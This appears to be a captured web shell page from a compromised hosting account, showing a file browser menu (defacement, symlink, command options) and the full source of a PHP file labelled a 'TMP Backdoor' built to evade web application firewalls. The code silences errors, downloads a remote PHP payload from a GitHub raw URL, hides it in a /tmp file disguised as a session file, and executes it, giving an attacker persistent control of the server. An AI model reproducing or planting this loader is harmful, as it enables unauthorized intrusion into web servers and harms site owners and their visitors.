
| Path : /home/gujo45me/public_html/ |
| Disable Functions : exec,passthru,shell_exec,system System : Linux server-604606.appsiete.com 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64 [ Home ][ Zone-h ][ Jumping ][ Symlink ][ Mass Depes ][ Command ] |
| Current File : /home/gujo45me/public_html/tmpalfa.php |
<?php
# 6ickzone TMP Backdoor v2
# Bypass 500 Internal Server Error & Blank Output (WAF Evasion Shell)
# Coded by: 0x6ick - Inspired by L0c4lh34rtz / IndoXploit legacy shell
@ini_set('display_errors', 0);
@set_time_limit(0);
@error_reporting(0);
$payload_url = 'https://raw.githubusercontent.com/ZuanXPloit/Test/refs/heads/master/batosay.php';
$tmp_path = '/tmp/.sess_' . substr(md5($_SERVER['HTTP_HOST']), 0, 10) . '.php';
if (isset($_GET['reload']) || !file_exists($tmp_path) || filesize($tmp_path) == 0) {
$payload = get_payload($payload_url);
if (stripos($payload, '<?php') !== false) {
file_put_contents($tmp_path, $payload);
usleep(300000);
}
}
if (file_exists($tmp_path) && filesize($tmp_path) > 0) {
include_once($tmp_path);
exit;
}
function get_payload($url) {
$ctx = stream_context_create(['http' => ['timeout' => 3]]);
$content = @file_get_contents($url, false, $ctx);
if (!$content) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$content = curl_exec($ch);
curl_close($ch);
}
return $content;
}
?>